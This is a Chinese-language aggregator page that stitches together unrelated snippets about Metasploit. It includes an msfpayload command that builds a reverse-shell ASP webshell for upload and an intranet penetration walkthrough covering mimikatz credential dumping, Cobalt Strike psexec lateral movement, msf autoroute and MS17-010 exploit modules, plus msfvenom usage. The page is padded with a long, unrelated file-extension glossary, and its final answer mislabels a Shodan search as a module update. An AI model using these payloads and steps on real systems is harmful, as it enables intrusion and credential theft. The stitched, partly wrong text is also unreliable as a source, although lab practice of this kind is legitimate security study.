msf生成php,msf生成木馬

本文目錄一覽：

• 1、msf生成的webshell在哪個文件夾
• 2、後綴為PHP的文件如何打開?
• 3、關於kali下msf生成payload的LHOST問題，求解答
• 4、內網滲透–對不出網目標的打法
• 5、msfvenom怎麼生成php
• 6、怎樣更新metasploit中的模塊

msf生成的webshell在哪個文件夾

可以通過指令查看msf里的payload 然後記住其位置：使用如下的指令來產生一個webshell，和前邊將的msfpayload的用法類似，只不過這裡生成的是一個網頁腳本文件：

產生webshell

msfpayload windows/meterpreter/reverse_tcp LHOST=your_ip | msfencode -t asp -o webshell.asp

然後將此webshell上傳到伺服器（這個步驟要有上傳許可權。）

後綴為PHP的文件如何打開?

*.php是一種網路開發的程序，它在伺服器端運行，也就是你如果想打開此文件（以網頁的形式），必須為他配一台伺服器或者安裝一個基於本機的服務性質的軟體！

*.php是一種網路開發的程序，它在伺服器端運行，也就是你如果想打開此文件（以網頁的形式），必須為他配一台伺服器或者安裝一個基於本機的服務性質的軟體,不過你可以使用寫字板之內的東西打開他，此時你看到的是源程序，如果是在網上下載的php的話，他已經在伺服器端運行，你只能看到結果！即我們常見的超文本html。

後綴名大全

A:

1 .ace: ace.exe或winace生成的壓縮文件

2 .ain: ain是一種壓縮文件格式，解開ain需要用ain.exe。在網上可以找到。

可以在各大的FTP pub/msdos utility之類地方尋找ain.exe

3 .arj,a01,a02…:

arj是一種非常常見的壓縮文件格式，它可以支持帶目錄，多文件壓縮，

一般FTP中DOSutility目錄下都可以找到arj.exe，一般的版本有2.4

2,2.382.50等，其文件格式是通用的，不存在格式不認問題。

a01,a02,a03是arj在多文件壓縮時後面文件的預設文件名。

展開arj文件可以用arj x -va -y filename.arj

在windows下可以試試用winzip展開。

4 .asp:

.asp文件通常指的是Active Server Pages文件，這個文本文件可以

包括下列部分的任意組合：文本/HTML 標記/ASP 腳本命令,可以用

ie瀏覽器直接打開，也可以用記事本打開編輯。

.asp文件也可能是一種文檔格式的文件，可以用cajviewer打開。

5 .avi:

一般用windows自帶的媒體播放器就可以播放。

如果沒有圖象只有聲音，則可能是mpeg4格式，需要裝插件。

如果有單獨的字幕文件，則可以用其它播放器。

B:

1 .BHX(BINHEX):

BinHex是蘋果機器的一種編碼方式.

WinZip可以解碼. 將email以文本方式存檔,擴展名為.BHX,

就可以直接用WinZip解壓了.

2. .bin

光碟映象文件，可以：

a.用Bin2ISO將bin轉成ISO文件，然後用WinImage解開.

注意：有些BIN文件實際上就是ISO文件如果上面的辦法有問題

可以直接將後綴改成iso,然後用WinImage解解看

b.用ISOBuster直接解BIN.

c.用daemon直接將BIN文件虛擬成光碟機

C:

1 .caj: cajviewer,CAJ文件瀏覽器是中國學術期刊（光碟版）電子雜誌社（CAJEJPH）

的產品。它是為中國期刊網（)的全文檢索，瀏覽開發的。

2 .cdi: 光碟映像文件，用DISKJuggle 就可以打開

3 .cdr: CorelDraw

4 .cdp: Nti CdMaker做的光碟Image.用 Nti CdMaker 的FileCopy刻.

5 .cfm:

www瀏覽器（伺服器支持，類似asp,php,jsp） or 文本編輯器看源碼

6 .chi:chm（html help)的索引，和chm文件一起使用

7 .chm:

基於Html文件格式的幫助文檔，在IE4.0以上可以雙擊直接打開。

製作工具可以採用Html Help WorkShop。

8 .cif:是easy cd creator地image文件

9 .cpj:

WinONCD的工程文件，不過如果那個Raw文件是2072位元組的扇區的話就是標準的ISO文件

換個擴展名，用什麼刻錄軟體都可以，最差用WinImage直接展開安裝也行。

10 .cpx: cpx是一種壓縮過的矢量圖格式,CorelDraw

D:

1 .dat：

一般指數據文件，比如某些音碟或者某些應用程序的數據。

是個很通用的擴展名（比如影碟，一般數據，……），無法判斷用那個程序打開，

除非有更多信息，比如這些文件是做什麼用的。

是某個軟體附帶的，還是獨立存在的，等等。

2 .dbf:

DOS下:

foxbase

foxpro

DN 中F3(view)

Windows:

qview(快速查看)

FoxPro

Office中Excel等.

3 .ddi: DISKDUPE,unimg,unddi,undisk

4 .dvi: Latex處理過的文件,用任何一種Latex軟體都可看它。

5 .dxf: AutoCad,3DMax

6 .dxr: Macromedia Director Protected Movie File

E:

1 .ecw: 有可能是ENSONIQ AudioPCI音效卡的波表樣本

2 .emf: 擴展的wmf文件

3 .eml: outlook express

4 .eps:

eps是一種特殊的ps文件, 通常是嵌入其他文檔中使用. 製作這種文件非常簡單:

a) 在Windows中安裝一台PostScript印表機(並不是真的要買一台, 僅僅是安裝驅動

程序), 例如 HP LaserJet 5P/5MP PostScript, 設置其屬性中的PostScript輸出格式為

內嵌的PostScript, 列印埠設為FILE(在磁碟上創建文件);

b) 在任何繪圖軟體中編輯好圖形後, 在列印對話框中將印表機設為那個PostScript

印表機, 然後列印到文件, 文件名可取為xxx.eps, 這將是你所需要的eps文件.

很多常用軟體，比如ACDSee、Word等都可打開eps文件。

F:

1 .fcd:用vitrul CD-ROM打開

2 .fla: Flash

G:

1 gerber file(.dat .rep .pho 文件): 電路圖可以送去制板的

2 .gif: gif是一種很普遍的圖像格式，用幾乎所有的圖像處理軟體都可以處理gif。

3 .gtp:guitar pro

.gtp是2.2以下版本的，3.0版本的是.gp3

H:

1 .hlp: 編輯可用help magic,help scribe

2 .hqx:

hqx格式就是所謂的Binhex 4.0文件。

實際是Ascii文件。

在PC上可以用winzip 6.2以上解開。

在Mac機上，如果你用Fetch 2.0以上來傳

(在隨機的Apple Internet Connect Kit上已帶)

可以自動轉成原來的Binary文件。

一般來說，你down了hqx格式的文件在PC上是派不上

什麼用場的，當然你可以用來和別人交換word文件什麼的。

I:

1 .icl:Icon Library,用AxIcons打開，一個專用的畫圖標的軟體。

2 .ic圖標文件，可以用acdsee轉成bmp文件。

3 .idx:cterm非常下載下來的文件索引，用cterm自帶的indexread打開

4 .iges:iges是一個基於NURBS的文件格式, 可以用AutoCad打開，如果不行，可以可以先拿到rhino中轉成DXF

5 .img:

img是軟盤image文件，一個img就是一個軟盤，尼需要一個工具將這樣

的文件展開還原到軟盤上，就是hd-copy，

6 .is

一般是光碟鏡像，直接用來刻盤或者用winimage解開

也可以裝一個虛擬光碟軟體daemon直接將之虛擬成光碟。

J:

1、.jpg，.jpeg：

.jpg是一種高壓縮比的真彩圖像文件格式，一般的圖像處理軟體都可以

顯示jpg圖像。推薦使用的看jpg程序有：在DOS下sea,在windows下用

acdsee,在UNIX下可以用xv來看jpg。

K:

1、.kc：

可以用kingcopy打開。

L:

1 .lwp: Lotus WordPro 格式

2 .lrc: 一個winamp插件的歌詞文件，可以在放mp3時顯示歌詞。以前叫lrics mate

3 .lzh:

lzh是很老的一種壓縮文件格式，近幾年已經很少用了，展開lzh

文件需要lha.exe，在FTP的DOS utility目錄下應該有。

好象以前有一種自解壓然後運行的exe是用lha壓的，lzh用winrar就能解

4 .ldb

Access資料庫鎖定文件，紀錄資料庫的鎖定信息，

比如是否被打開，是否以獨佔形式訪問等等。

M:1 .max: 3DMax文件。

2 .mdb: Microsoft Access資料庫文件

3 .mdl: Rose文件

4 .mif:一種是MaxPlusII的文件

5 .mov:電影文件，用Quicktime打開。

6 .mpp:Project File(Ms Project)

7 .msf:

part 1：文件頭，我見到的幾個都是mstor打頭的，文件頭包括版本信息、註冊表

的一些鍵值、圖片的位置信息等等，關係不是很大，不必仔細研究。

part 2: 圖片序列，圖片都是jpeg格式的，每張圖片的頭可以通過查找”JFIF”字元串查到，查到後一定要後退六個位元組，才是真正的jpeg文件頭。也就是說

jpeg文件的第七到第十個位元組是”JFIF”。每兩張圖片之間會有大量的位元組

填充0,中間你會找到屏保運行時產生的臨時文件的名字，如c:\\1.jpg;

由於jpg文件不校驗位元組和長度的，你可以隨便取到臨時文件名上面的哪個

0 上。把之間的部分拷貝出來另存為.jpg文件就可以了，

part 3：圖片都取出來了，還管它幹什麼，呵呵

7 .msi:

MS Windows的新的安裝文件標準。已經在Office2000和Windows2000中採用。

98或NT下，可以裝下面的軟體：InstMsi9x.exe,InstMsiNT.exe

N:

1 .nb:Mathematica的一種文件格式把。

2 .nf

察看方法：

1.文本編輯器都可以看。建議將自動換行設為80列。

專門的查看軟體：

NFOShow1.1是網友寫的，實際效果是我見過最好的，不過有時copy時會出錯退出。DAMN.NFO.Viewer.v2.0隻有幾十k，很好用，足夠了。還可以在dos窗口下type xx.nfo

3 .ngp,.ngc:

是模擬器遊戲的文件neopocott 0.35b(ngp模擬器)ngp模擬器neopocott升級到

了v0.35b版本，可在win9x, 2k, me平台上運行。新版本暫停功能得到修改，支持

了ngc的擴展名文件，可以更好的存儲和讀取文件，增加了對鍵盤的設置等等

4 .njx: 南極星的字處理軟體的文檔格式

5 .nrg:Nero做的CD Image,用nero直接打開刻盤即可

1 .opx： Microsoft 組織結構圖，用office自帶的組件可以打開，

默認不安裝，需要添加程序。

P:

1 .pdf:

pdf是adobe公司開發的一種類似於poscript的文件格式。可以用

adobe的acrobat,arcrbat reader來編輯，打開pdf文件

2 .pdg:超星閱讀器SSreader3.52以上版本

3 .phtml:cajviewer

4 .pl: 一般說來是PERL Script,也可能是mp3播放軟體的playlist文件

5 .ppt .pps:PowerPoint

6、prn：

prn文件是印表機文件，比如你在Word中選擇”列印到文件”就會生成這種文件。

你可以把擴展名改為ps，然後用GSView打開。

或者用PrFile這個軟體直接把prn文件送到PS印表機列印出來。

7 .ps:

ps的意思是PostScript，這是一種頁面描述語言，主要用於高質量列印。

在UNIX和windows下都可以用GhostView來看ps文件。其homepage是

如果你有PoscriptScript支持的印表機，可以直接列印PS文件。

如果你想製做PS文件，簡單的辦法是：在Windows下安裝一個支持Post Script

的印表機驅動程序，比如HP 4 PS，你不需用非有這個印表機安裝在你的機器上。安裝好

驅動之後，在WIndows下任何一個編輯器中編輯好你需要轉成PS的文件，比如從

Word下。然後選擇”列印”，選擇那個PS兼容的驅動程序，然後選擇”print to file”，

它將把列印輸出送到一個文件中去。因為你用了一個Poscript 的列印驅動程序，

那麼這個列印文件就是PostScript文件了。將該文件改名字為XXX.ps就可以了。

8 .ps.gz:

gzipped postsript 文件，可以用gsview直接打開，其支持gzip

如果是用IE下載的，有可能實際已經解開，可以去掉gz後綴試試。

9 .psz: 改成*.ps.gz試試,然後用gzip或者winzip解開就是.ps文件了

10 .psf: outline PostScript printer font (ChiWriter)

11 .ptl: AUTOCAD做出來的列印文件

Q:

R:

1、.rar，.r01，r02……:

rar是一種壓縮文件格式，在DOS下解開RAR可以用rar.exe，在各大FTP

裡面都可以找到，一般在pub/msdosutility之類地方。需要注意的是rar

高版本壓縮的文件低版本不認。當前最新的rar for DOS是2.X版，如果

能找到2.x版的話最好不要用1.X板的rar，2版的rar文件相互是通用的。

rar的命令行參數幾乎和arj一樣，rar x -v -y filename.rar

可以展開文件，包括帶目錄和多文件壓縮。

rar多文件壓縮時rar之後的文件名是r00,r01,r02….

DOS下的軟體不支持長文件名，所以如果你的rar裡面有長文件名並且因為

在DOS下展開丟失了得話，可以試試winrar for win95，支持長文件名。

在各大ftp上應該也可以找到。其所有版本都可以認rar2.X得文件。

2、.raw：

是easy cd或者winoncd等軟體做的CDROM的ISO鏡像

RAW屬於MODE1的

3、.raw：

可用Photoshop看。

4、.rom：

是很小的音樂壓縮格式，使用realplayer可以播放。

5、.rom：

是模擬器的文件吧。

6、.rpm：

RPM 是Redhat Package Manager 的簡寫。

是Linux 底下的軟體包管理系統。

到Linux 底下用使用rpm 來對它進行操作。

7、.rm：

RM文件是一個包含了RA文件URL地址的文件，作用就同M3L與MP3一樣，用於

REALPLAYER在INTERNET上播放RA流。

8、.rmx：

可以用realplayer 打開。

9、.rtf：

rich text format

包含格式的文本，可用於各種編輯器間交換文件，但是體積要比專用格式大很多。 可以用word，寫字板打開，一般的支持格式的編輯器都能打開。

S:

1、.sfe：file split 分割文件。

用file split 可以把他們合併成原來的zip文件。

或許還有自動合併得bat文件呢。

2、.sfv：

不是文件分割器產生的,是sfv32w產生的,一般用來做windows下的文件校驗。

3、.shar：

Shell Archive, 文本格式的打包文件，類似tar, 不過tar生成的為binary file，在UNIX下sh *.shar 即可解包, 或用專門的 shar/unshar utilities。

4、.shg：

是microsoft的help workshop的圖形處理工具生成的圖形文件，

是用來在help中調用的。

5、.sit：

Macintosh Stuffit archives,

as well as UUE (uuencoded), HQX (BinHex), bin (MacBinary), ZIP, ARC,

ARJ, and GZ archives

use “Aladdin Expander” to expand

6、.srm：

呵呵,當然是用Kiven電子書庫了.你可以去化雲坊down 3.0.12的版本,也可以去 kiven的主頁上當最新版.還有源碼的呦.

7、.stx：

Syntax file of Edit Plus

8、：

是Flash的動畫格式，如果瀏覽器裝了插件，可以用瀏覽器打開，但最好用

Flash Player Browser打開。

9、.swp：

Scientific Word Place

10、.spw

SigmaPlot Worksheet

T:

1、.tar.GZ or .tar：

.tar.gz，或者.tgz的文件一般是在UNIX下用tar和gunzip壓縮的文件。

可能的文件名還有.tar.GZ等。gunzip是一種比pkzip壓縮比高的壓縮 程序，一般UNIX下都有。tar是一個多文件目錄打包器，一般也是在unix下。

在UNIX下展開.tar.gz文件用tar zxvf filename.tar.gz就可以了 或者用gunzip -d filename.tar.gz得到filename.tar 然後用tar xvf filename.tar解包，兩步完成。

在PC環境下解tgz，可以用winzip 6.2以上版本，可以直接打開extract。

建議在win95或者NT下使用winzip，因為很多這樣的文件都是在UNIX下壓縮的，

很可能有長文件名，但是WIndows3.1是不支持長文件名的，however,win31下的winzip 也是應當可以展開tgz的。

2、.tar.Z：

.Z的文件一般是在UNIX下用compress命令壓縮的。在UNIX下解開可以用 uncompress filename.Z。在PC下可以用winzip6.2以上版本，建議使用

win95版本的winzip，因為win31不支持長文件名，而UNIX下的文件很

可能是長文件名。但win31下winzip應該也可以解開。

如果是.tar.Z的文件的話可以用uncompress先解開外面一層，然後用

tar xvf filename.tar解開tar文件。在PC下還是用winzip。

3、.tex：

.tex本身是個文本文件，必須經過編譯成dvi文件，使用winLatex就可以，如果你有 unix當然會帶TeX或LaTex的。

U:

1、.ufo：

問：這種文件要用什麼程序打開？quick view plus 可以嗎？

答1：使用photoimpact應該可以.

答2：通常是漫畫,可以用冷雨瀏覽來看.

答3：找ufo2jpg.exe可以將ufo文件變成熟悉的JPG

2、.uu，.uue：

.uu是uucode的文件。uucode是一種把8bit文件轉成7bit的演算法。

我們知道，exe文件或者其他二進位文件是不可以直接用email

發出去的。uucode可以把這些文件轉成7bit格式，就是普通文本文件格式

(如下面的樣子)，然後就可以被接收方還原。

begin 640 pass

M(“$Y-2V]R5!1=UI!.C`Z,#I3=7!E`@F]O=#IB$Y-2V]R5!1=UI!.C`Z,#I3=7!EBU5V5R.B\\Z+V)I;B]C

MV@@WES861M.BHZ,#HP.E-YW1E;2!6″B`@(=U97-T.F-U-I)=M%9HN

M:S(Z.3DX.CDY.#I\’=65S=”!!8V-O=6YT.B]UW(O5OQE+V=U97-T.B]B

如果你收到一個email是uucode做的，可以把它存成一個文件，將begin 640..

之前的部分刪除，然後改文件名為.uu，然後用uudecode解開。

在windows下可以用winzip6.2以上版本。

V:

1、.vcd：

一般是virtual driver的虛擬光碟機文件

也可以轉換成iso，用daemon打開，參見格式轉換，.vcd-.iso

另外金山影霸的文件也可能是vcd。

2、.vcf：

是地址本文件,用outlook express可以打開,(雙擊就可以)。

3、.vob：

DVD數據文件

4、.vos:

VOS 是一款強大的電子琴模擬軟體,.vos文件可以用它打開。

5、.vqf：

用Winamp播放，需要裝相應的插件。

備註：VQF是YAMAHA公司和日本NTT公司聯合開發的一種新音樂格式，它的壓縮比比MP3更高，音質卻與MP3不相上下，而它之所以沒有MP3那般出盡風頭，大概與其推出時間較遲以及缺和相應的廣告宣傳有關吧，加之其播放、製作工具目前還不是很豐富，所以知道的人不是很多。但不管怎麼說，VQF的確是一種優秀的音樂壓縮格式。常見播放工具有Yamaha VQ Player等等。

6、.vsd：

visio畫的流程圖

7、.vss：

visio template file

W:1、.wdl：

Dynadoc，華康文件閱讀器 可用dynadoc 或 FPread32.exe為關鍵字在ftp搜索引擎搜索。

2、.wmf：

WINDOWS的圖元文件，用ACDSEE可以看，WORD也可以打開。

3、.wpd：

WPD是corel公司的wordperfect字處理軟體的文檔的擴展名。

4、.wsz：

winamp的skin，down下來以後是wsz格式ws打開一個winzip先，然後用winzip里的open。。。。。。。

X:

1、.xls：

MicroSoft Excel的文件。

2、.xml：

eXtensible Markup Language

SGML的一個子集, 1998年2月正式發布1.0版

目前IE5.0可支持，可以在IE5.0下瀏覽.xml文件，但同時必須有相應的.xsl文件

才能正常顯示。

Y:

……

Z:

1、.zip：

zip是一種最常見的壓縮格式，在UNIX下解開zip用unzip命令。

在PC下解開zip可以用pkunzip.exe,一般在大ftp裡面都可以找到，

或者用winzip解開。pkunzip -d filename.zip可以帶目錄結構解開文件

關於kali下msf生成payload的LHOST問題，求解答

msf的payload中能建立反彈shell的，比如reverse_tcp，像是windows/meterpreter/reverse_tcp或者是android/meterpreter/reverse_tcp，它們的LHOST參數（LHOST就是Local host的意思）是攻擊方的IP地址，用來監聽對方的連接的。其實很好理解，反彈shell嘛，就是建立反彈連接的，當然是反彈到攻擊主機了。

如果不是建立反彈shell的payload，一般是沒有LHOST的，取而代之的是RHOST參數，是目標主機的IP地址。

內網滲透–對不出網目標的打法

配置網路

在VM虛擬機中按照下邊的網路拓撲進行配置網路。網路拓撲圖如下：

win7具有雙網卡，其中外網ip是192.168.8.133，內網網段是52。三台機器彼此互通，但是win server 2008和win2003不通外網。用我mac作為攻擊機，來對這個靶場環境進行滲透測試。

外網打點

在win7這台靶機上，使用PHPStudy讓網站可以運行起來。在攻擊機上，訪問   可以看到是一個phpStudy 探針。對這網站進行滲透，因為本文主要寫在內網滲透過程中對不出網主機的滲透，所以此處外網打點就不寫的很詳細了。

針對此靶場進行外網滲透拿許可權大致有這幾種方法：

通過phpmyadmin弱口令，進入phpmyadmin後台。然後知識點就變成了，通過phpmyadmin進行getshell，這個點又分為，得到網站絕對路徑後，使用select into outfile的方式寫shell和利用日誌寫shell。在此處，我是使用日誌寫shell的方法拿到許可權。因為secure_file_priv配置為null，禁止修改目錄下的文件，也就不能使用into outfile的方式寫入shell。

通過目錄掃描可以掃出beifen.rar，備份文件。在源碼中可以找到登陸後台的賬號密碼：admin/123456和登陸路徑/index.php?r=admin，在前台模板文件中添加一句話木馬連接也可獲取shell。

獲得webshell的信息收集

通過外網打點獲得的webshell，可以進行一波信息收集，摸清我是誰？我在哪？有沒有內網環境？有沒有殺軟？通過拿到webshell後的信息收集的結果來評估一下有沒有必要繼續深入或者初步了解繼續深入的話需要哪些手段。

我是誰？

蟻劍已經給出基礎信息

我在哪？

使用ipconfig /all 看一下網路信息

目標有兩個網卡，並且存在域環境，那麼就有打它內網的必要了。

有沒有殺軟?

tasklist查看一下進程信息

根據進程查一下是否有殺軟

目標沒有使用殺軟，還有域環境那麼讓它直接cs上線。

內網滲透

cs上線

內網信息收集

信息收集每個人都有自己的習慣，信息收集的順序和信息收集的項目也都不太一樣，只要根據自己的習慣和嗅覺，針對目標具體情況進行收集，以求儘快的拿下目標就好。信息收集的越全面突破口也就會越多，考慮到篇幅和文章內容匹配度等因素，此處並沒有寫出大量信息收集方法。

使用cs自帶的net view查看域信息。

使用cs自帶功能進行埠掃描，分別對8和52兩個網段進行掃描進行完這兩個步驟以後，cs會把掃到的目標列出來。

因為拿到的是管理員許可權，可以先抓一波密碼。用 cs 的 hashdump 讀內存密碼，用 mimikatz 讀註冊表密碼：logonpasswords。

此處打碼的地方是因為配置靶機登陸時靶機提示重置密碼，我給靶機改了個包含個人信息的密碼。蠢哭。拿到密碼後，目標主機沒有開啟防火牆，可以使用cs自帶的psexec做一波橫向，因為抓到很多域中機器密碼，域控密碼也抓到了。

內網橫向（通過登錄憑證）

這個靶機設置的比較簡單，抓到密碼後，因為抓到了域控登陸的憑證，那麼使用psexec即可橫向內網所有機器。因為，另外兩台內網的機器不出網，那麼就到了本文著重練習的點了，打不出網的機器。

不出網機器上線一般有以下幾種方式：

使用smb beacon

配置listener通過HTTP代理上線

使用pystinger搭建socks4代理

這幾種方式之前有師傅也在先知寫過 《不出網主機上線方法》 。此處我採用的SMB beacon這個方法。

SMB Beacon使用命名管道通過父級Beacon進行通訊，當兩個Beacons鏈接後，子Beacon從父Beacon獲取到任務並發送。因為鏈接的Beacons使用Windows命名管道進行通信，此流量封裝在SMB協議中，所以SMB beacon相對隱蔽。SMB beacon不能直接生成可用載荷, 只能使用 PsExec 或 Stageless Payload 上線。

首先得到內網中一台主機的beacon，抓取密碼後進行smb噴射，得到另一台開放445埠的機器上的administrator賬戶密碼，在目標機器不出網的情況下，可以使用Smb beacon使目標主機上線

使用條件

具有 SMB Beacon 的主機必須接受 445 埠上的連接。

只能鏈接由同一個 Cobalt Strike 實例管理的 Beacon。

利用這種beacon橫移必須有目標主機的管理員許可權或者說是擁有具有管理員許可權的憑據。

使用方法：

1.建立smb的listener

2.在cs中使用psexec進行橫向移動，選擇現有的beacon作為跳板，這裡憑據必須是administrator ，即擁有目標主機管理員許可權

3.連接成功，可以看到smb beacon上線的主機右側有∞∞標識

使用這種方法上線的機器，主要是通過出網機作為一個中間人，不出網主機成功上線後，如果出網機一斷開，這個不出網主機也會斷。

內網橫向（通過ms-17010）

在拿下win7的時候，可以給它傳一個fscan，給win7做一個內網大保健。上傳fscan後，運行掃一下內網。

發現存在ms17010。

ms17010常見的幾種打法：

msf

ladon/ladon_ms17010

從msf分離出的exe

nessus里的exe

cs插件

這幾種打法，我在這個環境中都做過嘗試。過程就不一一敘述了，直接說我測試的結果。msf是最穩定的，但是打起來有稍許的麻煩因為要設置監聽模塊和選擇攻擊模塊等配置。ladon_ms17010方便但是不太穩有時候會打不成功。cs插件也不穩，並且在這種不出網網路不穩定的情況下成功率會變的更低。

這個圖片的ip可能跟上邊配置符不起來，因為我在測試過程中，網斷過幾次，ip就變了。所以，在打的時候，如果ladon和分離出的exe沒有打成，不要輕易放棄，用msf在打打試試，畢竟工具就是工具，不能過分依賴某個工具。

在這種不出網的情況下，可以優先考慮使用從msf分離出的exe和ladon_ms17010來打，打成功會直接通過自定義的dll新建一個用戶並加入管理員組，開啟3389埠。根據實際情況，可考慮在合適的時間段和條件下直接遠程登入，翻一下敏感數據，往往會因為運維人員的很多「好習慣」而給滲透帶來很多便利，比如說「密碼本.txt」。

msf打不出網機器的ms17010

msf在單兵作戰的時候還是很穩定很香的。首先，讓出網機器先在msf上線，可以用cs直接傳遞會話，或者生成個msf馬直接運行一下。在這的方法就很多了。win7在msf上線後，因為我們已經提前知道了，存在52這個不出網的段，那麼就需要在msf中添加路由。

查看路由

run get_local_subnets

添加路由

run autoroute -s 192.168.52.0/24

查看添加的路由

run autoroute -p

把shell切換到後台，然後使用ms17010模塊進行漏洞利用，監聽時使用正向監聽，即可

小貼士：

漏洞檢測方法：

use auxiliary/scanner/smb/smb_ms17_010

之後設置一下目標ip和線程即可，這裡因為已經掃出存在漏洞的機器了，也就不在敘述。

漏洞利用常使用的是：

auxiliary/admin/smb/ms17_010_command

exploit/windows/smb/ms17_010_eternalblue

exploit/windows/smb/ms17_010_psexec

這裡的第一個和第三個模塊需要目標開啟命名管道，並且比較穩定。第二個模塊只要存在漏洞即可，但是會有概率把目標打藍屏，而且殺軟攔截也會比較嚴格，如果有殺軟就基本可以放棄這個模塊了。

在打ms17010的時候，不妨使用auxiliary/admin/smb/ms17_010_command模塊探測一下是否可以使用命名管道。

use auxiliary/admin/smb/ms17_010_commandsetrhosts192.168.164.156192.168.164.161setcommandtasklistshow optionsrun

如果命令執行成功的話就可以優先考慮

auxiliary/admin/smb/ms17_010_commandexploit/windows/smb/ms17_010_psexec

這兩個模塊進行利用。

我在上邊打得時候因為目標機器沒有殺軟就直接使用exploit/windows/smb/ms17_010_eternalblue來打了，期間為了測試打過多次，確實出現了把目標機器打重啟的情況。

總結

這個靶場設計的技能點比較基礎，外網打點獲得shell後，直接可以通過cs上線，在管理員許可權下，抓取密碼，新建一個smb beacon然後使用psexec對內網兩台不出網的機器進行橫向。

msfvenom怎麼生成php

metasploit-framework旗下的msfpayload（荷載生成器），msfencoder（編碼器），msfcli（監聽介面）已然成為歷史，取而代之的是msfvenom。

正所謂萬變不離其宗，了解原理是最重要的。

現在，metasploit-framework完美搭檔是msfvenom+msfcosole

下面，我們就來看一下msfvenom。

root@localhost:~# msfvenom -h

Error: MsfVenom – a Metasploit standalone payload generator.

Also a replacement for msfpayload and msfencode.

Usage: /usr/bin/msfvenom [options] var=val

Options:

-p, –payload payload Payload to use. Specify a ‘-‘ or stdin to use custom payloads

–payload-options List the payload’s standard options

-l, –list [type] List a module type. Options are: payloads, encoders, nops, all

-n, –nopsled length Prepend a nopsled of [length] size on to the payload

-f, –format format Output format (use –help-formats for a list)

–help-formats List available formats

-e, –encoder encoder The encoder to use

-a, –arch arch The architecture to use

–platform platform The platform of the payload

–help-platforms List available platforms

-s, –space length The maximum size of the resulting payload

–encoder-space length The maximum size of the encoded payload (defaults to the -s value)

-b, –bad-chars list The list of characters to avoid example: ‘\x00\xff’

-i, –iterations count The number of times to encode the payload

-c, –add-code path Specify an additional win32 shellcode file to include

-x, –template path Specify a custom executable file to use as a template

-k, –keep Preserve the template behavior and inject the payload as a new thread

-o, –out path Save the payload

-v, –var-name name Specify a custom variable name to use for certain output formats

–smallest Generate the smallest possible payload

-h, –help Show this message

root@localhost:~#

一，msfvenom生成payload的常見格式為：

最簡單型：

msfvenom -p payload payload options -f format -o path

1

1

編碼處理型：

msfvenom -p payload payload options -a arch –platform platform -e encoder option -i encoder times -b bad-chars -n nopsled -f format -o path

1

1

注入exe型+編碼：

msfvenom -p payload payload options -a arch –plateform platform -e encoder option -i encoder times -x template -k keep -f format -o path

1

1

拼接型：

msfvenom -c shellcode -p payload payload options -a arch –platform platform -e encoder option -i encoder times -f format -o path

1

1

-o輸出參數可以用「」號代替

-f指定格式參數可以用單個大寫字母代替：

例如：X 代表 -f exe

[H]arp

[P]erl

Rub[Y]

[R]aw

[J]s

e[X]e

[D]ll

[V]BA

[W]ar

Pytho[N]

怎樣更新metasploit中的模塊

1、打開msf，輸入命令use auxiliary/gather/shodan_search。

2、然後輸入show options看看有哪些需要設置。

3、設置查詢語句set QUERY “webcamxp”。

4、run查看結果。

5、發現已經更新成功了。

注意事項：

Metasploit的設計初衷是打造成一個攻擊工具開發平台，本書稍後將講解如何開發攻擊工具。然而在目前情況下，安全專家以及業餘安全愛好者更多地將其當作一種點幾下滑鼠就可以利用其中附帶的攻擊工具進行成功攻擊的環境。